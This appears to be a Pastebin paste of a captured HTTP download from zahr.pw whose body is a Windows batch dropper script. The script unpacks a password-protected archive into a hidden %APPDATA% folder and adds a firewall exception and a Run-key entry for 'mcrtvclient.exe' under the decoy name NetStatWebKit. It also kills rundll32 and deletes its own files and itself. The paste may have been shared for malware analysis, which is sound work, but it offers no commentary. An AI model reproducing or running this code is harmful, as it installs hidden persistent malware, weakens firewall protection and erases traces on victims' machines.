Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- GET /sh/shlapsizeof HTTP/1.1
- Host: zahr.pw
- HTTP/1.1 200 OK
- Server: nginx/1.10.1
- Date: Thu, 29 Sep 2016 17:57:42 GMT
- Content-Type: application/octet-stream
- Content-Length: 1392
- Last-Modified: Sat, 24 Sep 2016 13:56:49 GMT
- Connection: keep-alive
- ETag: "57e68621-570"
- Accept-Ranges: bytes
- HTTP/1.1 200 OK
- Server: nginx/1.10.1
- Date: Thu, 29 Sep 2016 17:57:42 GMT
- Content-Type: application/octet-stream
- Content-Length: 1392
- Last-Modified: Sat, 24 Sep 2016 13:56:49 GMT
- Connection: keep-alive
- ETag: "57e68621-570"
- Accept-Ranges: bytes
- set a=cd
- set b=attrib
- set c=taskkill
- %a% "%APPDATA%"
- %b% +h "%APPDATA%\shlapsizeof.cmd"
- if exist "%APPDATA%\nwe.bin" goto end
- "%APPDATA%\7sh.exe" x -pf3ls0gd -y "%APPDATA%\sharchivedmngr" -o"%APPDATA%"
- %b% +h +s +r "%APPDATA%\lappclimtfldr"
- del /f /q "%APPDATA%\sharchivedmngr"
- %a% "%APPDATA%"
- %a% lappclimtfldr
- %b% +h +s +r /s /d
- netsh firewall add allowedprogram "%APPDATA%\lappclimtfldr\mcrtvclient.exe" NetStatWebKit ENABLE
- if exist mcrtvclient.exe start mcrtvclient.exe
- %c% /f /im rundll32.exe
- ping 127.0.0.1 -n 1
- %c% /f /im rundll32.exe
- reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "NetStatWebKit" /t REG_SZ /d "%APPDATA%\lappclimtfldr\mcrtvclient.exe"
- %c% /f /im mcrtvclient.exe
- ping 127.0.0.1 -n 2
- if exist mcrtvclient.exe start mcrtvclient.exe
- %c% /f /im rundll32.exe
- echo 1>"%APPDATA%\nwe.bin"
- %b% +s +h "%APPDATA%\nwe.bin"
- reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "NetStatWebKit" /t REG_SZ /d "%APPDATA%\lappclimtfldr\mcrtvclient.exe"
- :end
- %b% -h "%APPDATA%\shlapsizeof.cmd"
- if not exist "%APPDATA%\java.exe" (del /f /q "%APPDATA%\7sh.exe")
- del /f /q "%APPDATA%\sharchivedmngr"
- del /f /q "%APPDATA%\java.exe"
- del /f /q "%APPDATA%\*.js"
- del /f /q "%APPDATA%\input"
- %b% -h "%APPDATA%\shlapsizeof.cmd"
- del /f /q "%APPDATA%\shlapsizeof.cmd"
- %c% /f /im rundll32.exe
- del %0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement